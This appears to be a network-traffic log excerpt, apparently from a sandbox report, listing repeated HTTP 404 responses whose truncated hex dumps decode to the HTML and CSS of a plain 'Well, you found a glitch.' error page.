Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:40 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:41 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:41 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:41 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:41 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:41 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 13 Oct 2024 16:20:46 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 